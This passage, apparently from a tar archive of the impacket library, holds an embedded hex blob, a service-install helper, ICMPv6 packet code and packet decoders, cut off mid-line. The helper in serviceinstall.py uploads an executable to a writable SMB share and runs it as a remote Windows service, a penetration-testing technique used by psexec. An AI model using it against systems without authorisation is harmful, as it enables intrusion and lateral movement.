'31a431ad31ba31c031da31eb31f1310232673203360f3642366836a236e736ba38c538' \ 'cd38e238f43844394a396a39a139b239fb39573a6c3ab23ab83ac43a193b4c3b843bef' \ '3bf53b463c4c3c703c933cc73ccd3cd93c203d343d553d613d883d953d9a3da83d833e' \ 'a63eb13ed43e233f883fb53f00000070000064000000ac31ca31393346335f337d33bb' \ '33ea33a3340835bc35dc35cc36f5364e37dc38bc39853ab63acc3a0d3b2c3bc93bfd3b' \ '2c3ca93c013d0f3d153d253d2a3d423d483d573d5d3d6c3d723d803d893d983d9d3da7' \ '3db53df53d123e2f3e00800000cc000000003007300d30ca30ff3018311f3127312c31' \ '303134315d318331a131a831ac31b031b431b831bc31c031c4310e32143218321c3220' \ '3286329132ac32b332b832bc32c032e1320b333d33443348334c335033543358335c33' \ '6033aa33b033b433b833bc33ab35bd35cf35f13503361536273639364b365d3670377a' \ '3792379937a337ab37b837bf37ef378838fd38b939cb39d839e439ee39f639013a313a' \ '613af83aa83bcb3b493c1a3d9d3dd53d183e1e3e523e5d3e803e443f513f6c3fd13fdd' \ '3f000000900000c000000055306f307830ca30ff3018311f3127312c31303134315d31' \ '8331a131a831ac31b031b431b831bc31c031c4310e32143218321c32203286329132ac' \ '32b332b832bc32c032e1320b333d33443348334c335033543358335c336033aa33b033' \ 'b433b833bc337f34fb3427354f35863590351b3822384638563871389138e738f83833' \ '394f39aa39b539e339f139003a0e3a163a233a413a4b3a543a5f3a743a7b3a813a973a' \ 'b23a573bc53bab3dc83df43d2d3e3a3e193f283f00a00000240000006e30ab30b530cd' \ '30f6302a315931003206320b32113218322a32c03300b000001c000000943198319c31' \ 'a031a431b031b43168326c32000000c000005c000000bc34c034043508352835443548' \ '356835743590359c35b435b835d835f8351436183634363836583678369836b836d836' \ 'f436f836183734373837583778379837b837d837e43700382038403860388038a038c0' \ '3800e00000e80000001c30a031a831203424342c3434343c3444344c3454345c346434' \ '6c3474347c3484348c3494349c34a434ac34b434bc34c434cc34d434dc344836b036c0' \ '36d036e036f03614372037243728372c37303738373c37683b603c643c683c6c3c703c' \ '743c783c7c3c803c843c903c943c983c9c3ca03ca43ca83cac3cb03cb43cb83cbc3cc0' \ '3cc43cc83ccc3cd03cd43cd83cdc3ce03ce43ce83cec3cf03cf43cf83cfc3c003d043d' \ '083d0c3d103d143d183d1c3d203d243d283d2c3d303d343d383d3c3d403d503d583d5c' \ '3d603d643d683d6c3d703d743d783d7c3d883d583e5c3e000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000000000' \ '00000000000000000000' \ impacket-0.9.10/impacket/examples/serviceinstall.py0000600000076500000240000002246012141750575022471 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: serviceinstall.py 698 2012-08-25 18:18:10Z bethus@gmail.com $ # # Service Install Helper library used by psexec and smbrelayx # You provide an already established connection and an exefile # (or class that mimics a file class) and this will install and # execute the service, and then uninstall (install(), uninstall(). # It tries to take care as much as possible to leave everything clean. # # Author: # Alberto Solino (bethus@gmail.com) # import random from impacket.dcerpc import srvsvc, dcerpc, svcctl, transport from impacket import smb,smb3 from impacket.smbconnection import * import string class ServiceInstall(): def __init__(self, SMBObject, exeFile): self._rpctransport = 0 self.__service_name = ''.join([random.choice(string.letters) for i in range(4)]) self.__binary_service_name = ''.join([random.choice(string.letters) for i in range(8)]) + '.exe' self.__exeFile = exeFile # We might receive two different types of objects, always end up # with a SMBConnection one if isinstance(SMBObject, smb.SMB) or isinstance(SMBObject, smb3.SMB3): self.connection = SMBConnection(existingConnection = SMBObject) else: self.connection = SMBObject self.share = '' def getShare(self): return self.share def getShares(self): # Setup up a DCE SMBTransport with the connection already in place print "[*] Requesting shares on %s....." % (self.connection.getRemoteHost()) try: self._rpctransport = transport.SMBTransport('','',filename = r'\srvsvc', smb_connection = self.connection) self._dce = dcerpc.DCERPC_v5(self._rpctransport) self._dce.connect() self._dce.bind(srvsvc.MSRPC_UUID_SRVSVC) srv_svc = srvsvc.DCERPCSrvSvc(self._dce) resp = srv_svc.get_share_enum_1(self._rpctransport.get_dip()) return resp except: print "[!] Error requesting shares on %s, aborting....." % (self.connection.getRemoteHost()) raise def createService(self, handle, share, path): print "[*] Creating service %s on %s....." % (self.__service_name, self.connection.getRemoteHost()) # First we try to open the service in case it exists. If it does, we remove it. try: resp = self.rpcsvc.OpenServiceW(handle, self.__service_name.encode('utf-16le')) except Exception, e: if e.get_error_code() == svcctl.ERROR_SERVICE_DOES_NOT_EXISTS: # We're good, pass the exception pass else: raise else: # It exists, remove it self.rpcsvc.DeleteService(resp['ContextHandle']) self.rpcsvc.CloseServiceHandle(resp['ContextHandle']) # Create the service command = '%s\\%s' % (path, self.__binary_service_name) try: resp = self.rpcsvc.CreateServiceW(handle, self.__service_name.encode('utf-16le'), self.__service_name.encode('utf-16le'), command.encode('utf-16le')) except: print "[!] Error creating service %s on %s" % (self.__service_name, self.connection.getRemoteHost()) raise else: return resp['ContextHandle'] def openSvcManager(self): print "[*] Opening SVCManager on %s....." % self.connection.getRemoteHost() # Setup up a DCE SMBTransport with the connection already in place self._rpctransport = transport.SMBTransport('','',filename = r'\svcctl', smb_connection = self.connection) self._dce = dcerpc.DCERPC_v5(self._rpctransport) self._dce.connect() self._dce.bind(svcctl.MSRPC_UUID_SVCCTL) self.rpcsvc = svcctl.DCERPCSvcCtl(self._dce) try: resp = self.rpcsvc.OpenSCManagerW() except: print "[!] Error opening SVCManager on %s....." % self.connection.getRemoteHost() return 0 else: return resp['ContextHandle'] def copy_file(self, src, tree, dst): print "[*] Uploading file %s" % dst if isinstance(src, str): # We have a filename fh = open(src, 'rb') else: # We have a class instance, it must have a read method fh = src f = dst pathname = string.replace(f,'/','\\') try: self.connection.putFile(tree, pathname, fh.read) except: print "[!] Error uploading file %s, aborting....." % dst raise fh.close() def findWritableShare(self, shares): # Check we can write a file on the shares, stop in the first one for i in shares: if i['Type'] == smb.SHARED_DISK or i['Type'] == smb.SHARED_DISK_HIDDEN: share = i['NetName'].decode('utf-16le')[:-1] try: self.connection.createDirectory(share,'BETO') except: # Can't create, pass print '[!] No written share found, aborting...' raise else: print '[*] Found writable share %s' % share self.connection.deleteDirectory(share,'BETO') return str(share) return None def install(self): if self.connection.isGuestSession(): print "[!] Authenticated as Guest. Aborting" self.connection.logoff() del(self.connection) else: fileCopied = False serviceCreated = False # Do the stuff here try: # Let's get the shares shares = self.getShares() self.share = self.findWritableShare(shares) res = self.copy_file(self.__exeFile ,self.share,self.__binary_service_name) fileCopied = True svcManager = self.openSvcManager() if svcManager != 0: serverName = self.connection.getServerName() if serverName != '': path = '\\\\%s\\%s' % (serverName, self.share) else: path = '\\\\127.0.0.1\\' + self.share service = self.createService(svcManager, self.share, path) serviceCreated = True if service != 0: parameters = [ '%s\\%s' % (path,self.__binary_service_name), '%s\\%s' % (path, '') ] # Start service print '[*] Starting service %s.....' % self.__service_name try: self.rpcsvc.StartServiceW(service) except: pass self.rpcsvc.CloseServiceHandle(service) self.rpcsvc.CloseServiceHandle(svcManager) except Exception, e: print "[!] Error performing the installation, cleaning up: %s" %e try: self.rpcsvc.StopService(service) except: pass if fileCopied is True: try: self.connection.deleteFile(self.share, self.__binary_service_name) except: pass if serviceCreated is True: try: self.rpcsvc.DeleteService(service) except: pass def uninstall(self): fileCopied = True serviceCreated = True # Do the stuff here try: # Let's get the shares svcManager = self.openSvcManager() if svcManager != 0: resp = self.rpcsvc.OpenServiceA(svcManager, self.__service_name) service = resp['ContextHandle'] print '[*] Stoping service %s.....' % self.__service_name try: self.rpcsvc.StopService(service) except: pass print '[*] Removing service %s.....' % self.__service_name self.rpcsvc.DeleteService(service) self.rpcsvc.CloseServiceHandle(service) self.rpcsvc.CloseServiceHandle(svcManager) print '[*] Removing file %s.....' % self.__binary_service_name self.connection.deleteFile(self.share, self.__binary_service_name) except Exception, e: print "[!] Error performing the uninstallation, cleaning up" try: self.rpcsvc.StopService(service) except: pass if fileCopied is True: try: self.connection.deleteFile(self.share, self.__binary_service_name) except: try: self.connection.deleteFile(self.share, self.__binary_service_name) except: pass pass if serviceCreated is True: try: self.rpcsvc.DeleteService(service) except: pass impacket-0.9.10/impacket/ICMP6.py0000600000076500000240000002620512141750575016443 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: ICMP6.py 529 2012-04-29 21:39:46Z bethus@gmail.com $ # from ImpactPacket import Header, Data #from impacket import ImpactPacket from IP6 import IP6 import array, struct class ICMP6(Header): #IP Protocol number for ICMP6 IP_PROTOCOL_NUMBER = 58 protocol = IP_PROTOCOL_NUMBER #ImpactDecoder uses the constant "protocol" as the IP Protocol Number #Size of ICMP6 header (excluding payload) HEADER_SIZE = 4 #ICMP6 Message Type numbers DESTINATION_UNREACHABLE = 1 PACKET_TOO_BIG = 2 TIME_EXCEEDED = 3 PARAMETER_PROBLEM = 4 ECHO_REQUEST = 128 ECHO_REPLY = 129 #Destination Unreachable codes NO_ROUTE_TO_DESTINATION = 0 ADMINISTRATIVELY_PROHIBITED = 1 BEYOND_SCOPE_OF_SOURCE_ADDRESS = 2 ADDRESS_UNREACHABLE = 3 PORT_UNREACHABLE = 4 SOURCE_ADDRESS_FAILED_INGRESS_EGRESS_POLICY = 5 REJECT_ROUTE_TO_DESTINATION = 6 #Time Exceeded codes HOP_LIMIT_EXCEEDED_IN_TRANSIT = 0 FRAGMENT_REASSEMBLY_TIME_EXCEEDED = 1 #Parameter problem codes ERRONEOUS_HEADER_FIELD_ENCOUNTERED = 0 UNRECOGNIZED_NEXT_HEADER_TYPE_ENCOUNTERED = 1 UNRECOGNIZED_IPV6_OPTION_ENCOUNTERED = 2 #ICMP Message semantic types (error or informational) ERROR_MESSAGE = 0 INFORMATIONAL_MESSAGE = 1 #ICMP message dictionary - specifying text descriptions and valid message codes #Key: ICMP message number #Data: Tuple ( Message Type (error/informational), Text description, Codes dictionary (can be None) ) #Codes dictionary #Key: Code number #Data: Text description #ICMP message dictionary tuple indexes MSG_TYPE_INDEX = 0 DESCRIPTION_INDEX = 1 CODES_INDEX = 2 icmp_messages = { DESTINATION_UNREACHABLE : (ERROR_MESSAGE, "Destination unreachable", { NO_ROUTE_TO_DESTINATION : "No route to destination", ADMINISTRATIVELY_PROHIBITED : "Administratively prohibited", BEYOND_SCOPE_OF_SOURCE_ADDRESS : "Beyond scope of source address", ADDRESS_UNREACHABLE : "Address unreachable", PORT_UNREACHABLE : "Port unreachable", SOURCE_ADDRESS_FAILED_INGRESS_EGRESS_POLICY : "Source address failed ingress/egress policy", REJECT_ROUTE_TO_DESTINATION : "Reject route to destination" }), PACKET_TOO_BIG : (ERROR_MESSAGE, "Packet too big", None), TIME_EXCEEDED : (ERROR_MESSAGE, "Time exceeded", {HOP_LIMIT_EXCEEDED_IN_TRANSIT : "Hop limit exceeded in transit", FRAGMENT_REASSEMBLY_TIME_EXCEEDED : "Fragment reassembly time exceeded" }), PARAMETER_PROBLEM : (ERROR_MESSAGE, "Parameter problem", { ERRONEOUS_HEADER_FIELD_ENCOUNTERED : "Erroneous header field encountered", UNRECOGNIZED_NEXT_HEADER_TYPE_ENCOUNTERED : "Unrecognized Next Header type encountered", UNRECOGNIZED_IPV6_OPTION_ENCOUNTERED : "Unrecognized IPv6 Option Encountered" }), ECHO_REQUEST : (INFORMATIONAL_MESSAGE, "Echo request", None), ECHO_REPLY : (INFORMATIONAL_MESSAGE, "Echo reply", None) } ############################################################################ def __init__(self, buffer = None): Header.__init__(self, self.HEADER_SIZE) if (buffer): self.load_header(buffer) def get_header_size(self): return self.HEADER_SIZE def get_ip_protocol_number(self): return self.IP_PROTOCOL_NUMBER def __str__(self): type = self.get_type() code = self.get_code() checksum = self.get_checksum() s = "ICMP6 - Type: " + str(type) + " - " + self.__get_message_description() + "\n" s += "Code: " + str(code) if (self.__get_code_description() != ""): s += " - " + self.__get_code_description() s += "\n" s += "Checksum: " + str(checksum) + "\n" return s def __get_message_description(self): return self.icmp_messages[self.get_type()][self.DESCRIPTION_INDEX] def __get_code_description(self): code_dictionary = self.icmp_messages[self.get_type()][self.CODES_INDEX] if (code_dictionary is None): return "" else: return code_dictionary[self.get_code()] ############################################################################ def get_type(self): return (self.get_byte(0)) def get_code(self): return (self.get_byte(1)) def get_checksum(self): return (self.get_word(2)) ############################################################################ def set_type(self, type): self.set_byte(0, type) def set_code(self, code): self.set_byte(1, code) def set_checksum(self, checksum): self.set_word(2, checksum) ############################################################################ def calculate_checksum(self): #Initialize the checksum value to 0 to yield a correct calculation self.set_checksum(0) #Fetch the pseudo header from the IP6 parent packet pseudo_header = self.parent().get_pseudo_header() #Fetch the ICMP data icmp_header = self.get_bytes() #Build an array of bytes concatenating the pseudo_header, the ICMP header and the ICMP data (if present) checksum_array = array.array('B') checksum_array.extend(pseudo_header) checksum_array.extend(icmp_header) if (self.child()): checksum_array.extend(self.child().get_bytes()) #Compute the checksum over that array self.set_checksum(self.compute_checksum(checksum_array)) def is_informational_message(self): return self.icmp_messages[self.get_type()][self.MSG_TYPE_INDEX] == self.INFORMATIONAL_MESSAGE def is_error_message(self): return self.icmp_messages[self.get_type()][self.MSG_TYPE_INDEX] == self.ERROR_MESSAGE def is_well_formed(self): well_formed = True #Check that the message type is known well_formed &= self.get_type() in self.icmp_messages.keys() #Check that the code is known (zero, if there are no codes defined) code_dictionary = self.icmp_messages[self.get_type()][self.CODES_INDEX] if (code_dictionary is None): well_formed &= self.get_code() == 0 else: well_formed &= self.get_code() in code_dictionary.keys() return well_formed ############################################################################ @classmethod def Echo_Request(class_object, id, sequence_number, arbitrary_data = None): return class_object.__build_echo_message(ICMP6.ECHO_REQUEST, id, sequence_number, arbitrary_data) @classmethod def Echo_Reply(class_object, id, sequence_number, arbitrary_data = None): return class_object.__build_echo_message(ICMP6.ECHO_REPLY, id, sequence_number, arbitrary_data) @classmethod def __build_echo_message(class_object, type, id, sequence_number, arbitrary_data): #Build ICMP6 header icmp_packet = ICMP6() icmp_packet.set_type(type) icmp_packet.set_code(0) #Pack ICMP payload icmp_bytes = struct.pack('>H', id) icmp_bytes += struct.pack('>H', sequence_number) if (arbitrary_data is not None): icmp_bytes += array.array('B', arbitrary_data).tostring() icmp_payload = Data() icmp_payload.set_data(icmp_bytes) #Link payload to header icmp_packet.contains(icmp_payload) return icmp_packet ############################################################################ @classmethod def Destination_Unreachable(class_object, code, originating_packet_data = None): unused_bytes = [0x00, 0x00, 0x00, 0x00] return class_object.__build_error_message(ICMP6.DESTINATION_UNREACHABLE, code, unused_bytes, originating_packet_data) @classmethod def Packet_Too_Big(class_object, MTU, originating_packet_data = None): MTU_bytes = struct.pack('!L', MTU) return class_object.__build_error_message(ICMP6.PACKET_TOO_BIG, 0, MTU_bytes, originating_packet_data) @classmethod def Time_Exceeded(class_object, code, originating_packet_data = None): unused_bytes = [0x00, 0x00, 0x00, 0x00] return class_object.__build_error_message(ICMP6.TIME_EXCEEDED, code, unused_bytes, originating_packet_data) @classmethod def Parameter_Problem(class_object, code, pointer, originating_packet_data = None): pointer_bytes = struct.pack('!L', pointer) return class_object.__build_error_message(ICMP6.PARAMETER_PROBLEM, code, pointer_bytes, originating_packet_data) @classmethod def __build_error_message(class_object, type, code, data, originating_packet_data): #Build ICMP6 header icmp_packet = ICMP6() icmp_packet.set_type(type) icmp_packet.set_code(code) #Pack ICMP payload icmp_bytes = array.array('B', data).tostring() if (originating_packet_data is not None): icmp_bytes += array.array('B', originating_packet_data).tostring() icmp_payload = Data() icmp_payload.set_data(icmp_bytes) #Link payload to header icmp_packet.contains(icmp_payload) return icmp_packet ############################################################################ def get_echo_id(self): return self.child().get_word(0) def get_echo_sequence_number(self): return self.child().get_word(2) def get_echo_arbitrary_data(self): return self.child().get_bytes()[4:] def get_mtu(self): return self.child().get_long(0) def get_parm_problem_pointer(self): return self.child().get_long(0) def get_originating_packet_data(self): return self.child().get_bytes()[4:] impacket-0.9.10/impacket/ImpactDecoder.py0000600000076500000240000006713112141750575020333 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: ImpactDecoder.py 529 2012-04-29 21:39:46Z bethus@gmail.com $ # # Description: # Convenience packet unpackers for various network protocols # implemented in the ImpactPacket module. # # Author: # Javier Burroni (javier) # Bruce Leidl (brl) import ImpactPacket import dot11 import IP6, ICMP6 from cdp import CDP from Dot11KeyManager import KeyManager from Dot11Crypto import RC4 """Classes to convert from raw packets into a hierarchy of ImpactPacket derived objects. The protocol of the outermost layer must be known in advance, and the packet must be fed to the corresponding decoder. From there it will try to decode the raw data into a hierarchy of ImpactPacket derived objects; if a layer's protocol is unknown, all the remaining data will be wrapped into a ImpactPacket.Data object. """ class Decoder: __decoded_protocol = None def decode(self, aBuffer): pass def set_decoded_protocol(self, protocol): self.__decoded_protocol = protocol def get_protocol(self, aprotocol): protocol = self.__decoded_protocol while protocol: if protocol.__class__ == aprotocol: break protocol=protocol.child() return protocol def __str__(self): protocol = self.__decoded_protocol i=0 out='' while protocol: tabline=' '*i+'+-'+str(protocol.__class__) out+="%s"%tabline+'\n' protocol=protocol.child() i+=1 return out class EthDecoder(Decoder): def __init__(self): pass def decode(self, aBuffer): e = ImpactPacket.Ethernet(aBuffer) self.set_decoded_protocol( e ) off = e.get_header_size() if e.get_ether_type() == ImpactPacket.IP.ethertype: self.ip_decoder = IPDecoder() packet = self.ip_decoder.decode(aBuffer[off:]) elif e.get_ether_type() == IP6.IP6.ethertype: self.ip6_decoder = IP6Decoder() packet = self.ip6_decoder.decode(aBuffer[off:]) elif e.get_ether_type() == ImpactPacket.ARP.ethertype: self.arp_decoder = ARPDecoder() packet = self.arp_decoder.decode(aBuffer[off:]) # LLC ? elif e.get_ether_type() < 1500: self.llc_decoder = LLCDecoder() packet = self.llc_decoder.decode(aBuffer[off:]) else: self.data_decoder = DataDecoder() packet = self.data_decoder.decode(aBuffer[off:]) e.contains(packet) return e # Linux "cooked" capture encapsulation. # Used, for instance, for packets returned by the "any" interface. class LinuxSLLDecoder(Decoder): def __init__(self): pass def decode(self, aBuffer): e = ImpactPacket.LinuxSLL(aBuffer) self.set_decoded_protocol( e ) off = 16 if e.get_ether_type() == ImpactPacket.IP.ethertype: self.ip_decoder = IPDecoder() packet = self.ip_decoder.decode(aBuffer[off:]) elif e.get_ether_type() == ImpactPacket.ARP.ethertype: self.arp_decoder = ARPDecoder() packet = self.arp_decoder.decode(aBuffer[off:]) else: self.data_decoder = DataDecoder() packet = self.data_decoder.decode(aBuffer[off:]) e.contains(packet) return e class IPDecoder(Decoder): def __init__(self): pass def decode(self, aBuffer): i = ImpactPacket.IP(aBuffer) self.set_decoded_protocol ( i ) off = i.get_header_size() end = i.get_ip_len() if i.get_ip_p() == ImpactPacket.UDP.protocol: self.udp_decoder = UDPDecoder() packet = self.udp_decoder.decode(aBuffer[off:end]) elif i.get_ip_p() == ImpactPacket.TCP.protocol: self.tcp_decoder = TCPDecoder() packet = self.tcp_decoder.decode(aBuffer[off:end]) elif i.get_ip_p() == ImpactPacket.ICMP.protocol: self.icmp_decoder = ICMPDecoder() packet = self.icmp_decoder.decode(aBuffer[off:end]) else: self.data_decoder = DataDecoder() packet = self.data_decoder.decode(aBuffer[off:end]) i.contains(packet) return i class IP6Decoder(Decoder): def __init__(self): pass def decode(self, buffer): ip6_packet = IP6.IP6(buffer) self.set_decoded_protocol(ip6_packet) start_pos = ip6_packet.get_header_size() end_pos = ip6_packet.get_payload_length() + start_pos contained_protocol = ip6_packet.get_next_header() if contained_protocol == ImpactPacket.UDP.protocol: self.udp_decoder = UDPDecoder() child_packet = self.udp_decoder.decode(buffer[start_pos:end_pos]) elif contained_protocol == ImpactPacket.TCP.protocol: self.tcp_decoder = TCPDecoder() child_packet = self.tcp_decoder.decode(buffer[start_pos:end_pos]) elif contained_protocol == ICMP6.ICMP6.protocol: self.icmp6_decoder = ICMP6Decoder() child_packet = self.icmp6_decoder.decode(buffer[start_pos:end_pos]) else: self.data_decoder = DataDecoder() child_packet = self.data_decoder.decode(buffer[start_pos:end_pos]) ip6_packet.contains(child_packet) return ip6_packet class ICMP6Decoder(Decoder): def __init__(self): pass def decode(self, buffer): icmp6_packet = ICMP6.ICMP6(buffer) self.set_decoded_protocol(icmp6_packet) start_pos = icmp6_packet.get_header_size() self.data_decoder = DataDecoder() child_packet = self.data_decoder.decode(buffer[start_pos:]) icmp6_packet.contains(child_packet) return icmp6_packet class ARPDecoder(Decoder): def __init__(self): pass def decode(self, aBuffer): arp = ImpactPacket.ARP(aBuffer) self.set_decoded_protocol( arp ) off = arp.get_header_size() self.data_decoder = DataDecoder() packet = self.data_decoder.decode(aBuffer[off:]) arp.contains(packet) return arp class UDPDecoder(Decoder): def __init__(self): pass def decode(self, aBuffer): u = ImpactPacket.UDP(aBuffer) self.set_decoded_protocol( u ) off = u.get_header_size() self.data_decoder = DataDecoder() packet = self.data_decoder.decode(aBuffer[off:]) u.contains(packet) return u class TCPDecoder(Decoder): def __init__(self): pass def decode(self, aBuffer): t = ImpactPacket.TCP(aBuffer) self.set_decoded_protocol( t ) off = t.get_header_size() self.data_decoder = DataDecoder() packet = self.data_decoder.decode(aBuffer[off:]) t.contains(packet) return t class IPDecoderForICMP(Decoder): """This class was added to parse the IP header of ICMP unreachables packets If you use the "standard" IPDecoder, it might crash (see bug #4870) ImpactPacket.py because the TCP header inside the IP header is incomplete""" def __init__(self): pass def decode(self, aBuffer): i = ImpactPacket.IP(aBuffer) self.set_decoded_protocol( i ) off = i.get_header_size() if i.get_ip_p() == ImpactPacket.UDP.protocol: self.udp_decoder = UDPDecoder() packet = self.udp_decoder.decode(aBuffer[off:]) else: self.data_decoder = DataDecoder() packet = self.data_decoder.decode(aBuffer[off:]) i.contains(packet) return i class ICMPDecoder(Decoder): def __init__(self): pass def decode(self, aBuffer): ic = ImpactPacket.ICMP(aBuffer) self.set_decoded_protocol( ic ) off = ic.get_header_size() if ic.get_icmp_type() == ImpactPacket.ICMP.ICMP_UNREACH: self.ip_decoder = IPDecoderForICMP() packet = self.ip_decoder.decode(aBuffer[off:]) else: self.data_decoder = DataDecoder() packet = self.data_decoder.decode(aBuffer[off:]) ic.contains(packet) return ic class DataDecoder(Decoder): def decode(self, aBuffer): d = ImpactPacket.Data(aBuffer) self.set_decoded_protocol( d ) return d class BaseDot11Decoder(Decoder): def __init__(self, key_manager=None): self.set_key_manager(key_manager) def set_key_manager(self, key_manager): self.key_manager = key_manager def find_key(self, bssid): try: key = self.key_manager.get_key(bssid) except: return False return key class RadioTapDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): rt = dot11.RadioTap(aBuffer) self.set_decoded_protocol( rt ) self.do11_decoder = Dot11Decoder() self.do11_decoder.set_key_manager(self.key_manager) flags=rt.get_flags() if flags is not None: fcs=flags&dot11.RadioTap.RTF_FLAGS.PROPERTY_FCS_AT_END self.do11_decoder.FCS_at_end(fcs) packet = self.do11_decoder.decode(rt.get_body_as_string()) rt.contains(packet) return rt class Dot11Decoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) self.__FCS_at_end = True def FCS_at_end(self, fcs_at_end=True): self.__FCS_at_end=not not fcs_at_end def decode(self, aBuffer): d = dot11.Dot11(aBuffer, self.__FCS_at_end) self.set_decoded_protocol( d ) type = d.get_type() if type == dot11.Dot11Types.DOT11_TYPE_CONTROL: dot11_control_decoder = Dot11ControlDecoder() packet = dot11_control_decoder.decode(d.body_string) elif type == dot11.Dot11Types.DOT11_TYPE_DATA: dot11_data_decoder = Dot11DataDecoder(self.key_manager) dot11_data_decoder.set_dot11_hdr(d) packet = dot11_data_decoder.decode(d.body_string) elif type == dot11.Dot11Types.DOT11_TYPE_MANAGEMENT: dot11_management_decoder = Dot11ManagementDecoder() dot11_management_decoder.set_subtype(d.get_subtype()) packet = dot11_management_decoder.decode(d.body_string) else: data_decoder = DataDecoder() packet = data_decoder.decode(d.body_string) d.contains(packet) return d class Dot11ControlDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) self.__FCS_at_end = True def FCS_at_end(self, fcs_at_end=True): self.__FCS_at_end=not not fcs_at_end def decode(self, aBuffer): d = dot11.Dot11(aBuffer, self.__FCS_at_end) self.set_decoded_protocol(d) self.subtype = d.get_subtype() if self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_CONTROL_CLEAR_TO_SEND: self.ctrl_cts_decoder = Dot11ControlFrameCTSDecoder() packet = self.ctrl_cts_decoder.decode(d.body_string) elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_CONTROL_ACKNOWLEDGMENT: self.ctrl_ack_decoder = Dot11ControlFrameACKDecoder() packet = self.ctrl_ack_decoder.decode(d.body_string) elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_CONTROL_REQUEST_TO_SEND: self.ctrl_rts_decoder = Dot11ControlFrameRTSDecoder() packet = self.ctrl_rts_decoder.decode(d.body_string) elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_CONTROL_POWERSAVE_POLL: self.ctrl_pspoll_decoder = Dot11ControlFramePSPollDecoder() packet = self.ctrl_pspoll_decoder.decode(d.body_string) elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END: self.ctrl_cfend_decoder = Dot11ControlFrameCFEndDecoder() packet = self.ctrl_cfend_decoder.decode(d.body_string) elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END_CF_ACK: self.ctrl_cfendcfack_decoder = Dot11ControlFrameCFEndCFACKDecoder() packet = self.ctrl_cfendcfack_decoder.decode(d.body_string) else: data_decoder = DataDecoder() packet = data_decoder.decode(d.body_string) d.contains(packet) return d class Dot11ControlFrameCTSDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = dot11.Dot11ControlFrameCTS(aBuffer) self.set_decoded_protocol(p) return p class Dot11ControlFrameACKDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = dot11.Dot11ControlFrameACK(aBuffer) self.set_decoded_protocol(p) return p class Dot11ControlFrameRTSDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = dot11.Dot11ControlFrameRTS(aBuffer) self.set_decoded_protocol(p) return p class Dot11ControlFramePSPollDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = dot11.Dot11ControlFramePSPoll(aBuffer) self.set_decoded_protocol(p) return p class Dot11ControlFrameCFEndDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = 